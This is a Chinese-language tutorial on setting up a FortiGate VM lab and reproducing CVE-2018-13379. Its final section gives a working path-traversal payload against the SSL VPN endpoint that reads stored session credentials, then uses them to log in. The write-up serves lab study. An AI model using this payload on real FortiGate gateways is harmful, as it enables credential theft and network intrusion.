CVE-2018-13379 环境搭建+漏洞复现
在复现该漏洞时候,发现网上的文章很少有本地复现的,所以将该漏洞的复现过程和环境的搭建写成文章,方便自己温习,也方便大家参考。在环境配置过程中坑点较多,请仔细阅读。
文章中如有出现错误的地方,希望能够帮忙指出,谢谢大家。
一. 环境搭建
1.该漏洞影响的Fortigate版本为:
(FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 )
2.测试环境为:
Tested on: 6.0.4
3.FortiOS 6.0.4 环境下载地址:
4.修改环境配置:
(1)打开VM虚拟机依次选择—文件—打开—选择FortiGate-VM64.vapp.vmx。
(2)右键该虚拟机,将内存和Cpu,全部改为1,如果不进行修改将会出现LIcense过期的问题。
(3)开机—登录
Login:admin
Password:mima1234
(4) 登录成功后进行虚拟机的配置。(在配置过程中通过Tab键可以进行命令的补全)
show system interface // 显示当前配置
config system interface // 进入配置模式
edit port1 // 配置port1口
set mode static //设置为静态
set ip [IP] 255.255.255.0
/* 设置ip和掩码 eg:set ip 192.168.120.66 255.255.255.0
配置该 IP 的目的是要通过本地来进行访问 不要直接复制我的ip */
end // 退出配置模式
(5) 登录web界面,账号密码同上。
坑点:
访问时不要使用https访问,要使用http,否则将出现如下页面。
(6)登录成功后进行wan口的配置。依次点击Network—Interfaces,然后出现画面如下。
因为port2口是dhcp模式,所以会自动获取地址,这里看一下port2口有没有获取到IP地址,如果没有的话,通过刷新界面即可解决。
坑点:一定要记住port2的IP地址,因为等会要通过该链接来完成访问,其实本来这个SSL VPN 是需要去手动配置的,这里环境中给大家搭建好了,只需要刷新就可完成,具体的搭建过程,这里转载一篇不错的文章来给大家作为参考。
FortiGate SSL VPN 配置过程
(7)在刷新完成后,将虚拟机关闭,继续进行虚拟机的配置。
将内存和处理器全部设置回2,然后继续开机,然后进行web页面的访问。
坑点:
如果不进行配置的修改,该SSL VPN 隧道是无法访问的。
(8)配置一台和 Wan口,即Port2口在同一网段的虚拟机,对该虚拟机的10443端口进行访问,为什么是10443端口,因为该SSL VPN 里面设置时,监听的端口为 10443。
(9)用在同一网段的主机进行 SSL VPN的访问。
坑点:注意这次访问的时候必须使用https,不能使用http,因为是ssl隧道。
eg: https://192.168.220.134:10443/remote/login?lang=en
实际上只需要输入 https://192.168.220.134:10443 即可
二. 漏洞复现
POC:
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
验证必备:
ip(SSL VPN 隧道的ip,本文为WAN口)
port(SSL VPN 的监听端口,本文为10443,常见的还有8443等端口)
POC
验证方式:
https://IP+port+POC
通过对该websession的查看
可知ssl vpn的一个账号密码为
login:test
Password:test
返回10443端口的登录界面,尝试通过泄露的账号密码登录 SSL VPN 隧道。
**成功登录**